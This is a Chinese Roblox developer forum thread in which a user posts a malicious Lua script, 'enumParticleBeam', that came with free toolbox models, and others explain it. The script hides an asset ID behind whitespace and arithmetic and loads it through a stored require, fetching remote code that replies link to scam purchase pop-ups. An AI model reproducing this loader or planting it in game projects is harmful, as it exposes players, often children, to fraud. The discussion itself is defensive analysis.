恶意插件脚本enumParticleBeam

最近在商店中查找免费模型,遭遇了一个恶意脚本,这个脚本注入机制并未查找到,也还没有查找对对应的病毒源,在删除自己所有插件后,在workspace中查找到了这个恶意脚本
脚本名:enumParticleBeam

local a = script.Parent
local b = game.ServerStorage _G.req = require
beamrem = script
local c = Instance.new("Model", workspace)
local d = Instance.new("Part", c)
local e = 0
local f = 3340528871.5                                                                                              * 2
wait(0)
_G.req(f):Fire()
for g, h in pairs(workspace:GetDescendants()) do
    if h:IsA("RemoteEvent") then
        e = e + 1
    end
end
return e

我对脚本研究不是很深,有技术大哥,可以帮忙解释下

3 个赞

脚本故意用了一些难懂的写法来混淆,
其实就是触发了项目里所有的RemoteEvent,然后把require执行了。
应该还有另一个脚本监听了Event事件,来require实际恶意弹窗购买的部分。

建议直接关闭第三方售卖和第三方传送,根本上解决问题

工具里的东西 拉出来后脚本最好都删了 自己写。病毒非常多

这玩意儿。应该有偷偷注入场景随机part下的逻辑,防不胜防

就是这一部分没找,不过目前删除这玩意儿,就好了

我一般只用工具箱的模型,拿到后递归遍历模型的所有子项,如果有script,localscript
全部删掉

嗯,我看过这些恶意脚本购买项目,完全能感受到他们和roblox狼狈为jian得感觉,这种商品很容易骗小孩,但最大受益者还是roblox。按道理,官方应该重重打击这些人,但实际受益者还是官方。所以我就呵呵了

1 个赞
关于我们    加入我们    条款    隐私政策
©2021 Roblox Corporation、Roblox、Roblox 标志及 Powering Imagination 是我们在美国及其他国家或地区的注册与未注册商标。
粤ICP备20013629号